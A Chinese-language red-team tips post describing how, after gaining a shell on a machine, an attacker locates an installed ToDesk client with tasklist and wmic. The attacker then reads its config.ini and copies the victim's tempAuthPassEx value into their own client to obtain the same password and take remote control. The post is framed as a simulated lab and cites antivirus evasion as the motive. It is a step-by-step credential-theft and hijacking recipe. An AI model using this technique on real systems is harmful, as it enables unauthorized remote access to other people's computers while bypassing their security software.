红队技巧5:利用todesk远程上线
前言
在内网渗透的时候,有时候会存在杀毒软件使得不好执行一些命令
这时候,你发现了存在todesk进程,测试可以利用todesk进行远程上线
实验开始(模拟实战中getshell后的操作)
1.下载todesk
https://www.todesk.com/download.html
2.放到虚拟机里和本机里安装
3.然后执行tasklist发现存在ToDesk.exe字段
4.然后执行wmic process where name="ToDesk.exe" get processid,executablepath,name发现ToDesk的安装路径
5.进入ToDesk的安装路径并且执行type config.ini命令
获取到的config.ini如下
[ConfigInfo]
passUpdate=xxx1
PrivateScreenLockScreen=xxx2
autoLockScreen=xxx3
downloadtimes=xxx4
clientId=xxx5
PrivateData=xxx6
PluginExpiresDays=xxx7
Resolution=xxx8
tempAuthPassEx=xxx9
updatePassTime=xxx10
isOpenTempPass=xxx11
language=xxx12
isAdmissionControl=xxx13
WeakPasswordTip=xxx14
Version=xxx15
isUpdate=xxx16
PresetDialogUpdateDate=xxx17
PresetDialogShowCount=xxx18
NewToken=xxx19
Token=xxx20
LoginType=xxx21
user=xxx22
LoginPhone=xxx23
LoginEmail=xxx24
AreaCode=xxx25
6.其中
clientId=xxx5为设备代码,在这里本机的这里输入
7.然后要获取密码
获取方法:
先关掉本机todesk的临时密码,然后将本机的config.ini中的tempAuthPassEx替换为受害机的tempAuthPassEx=xxx9,重启本机的todesk,会发现
发现本机和受害机的todesk密码变相同了
8.输入密码,可以远控了
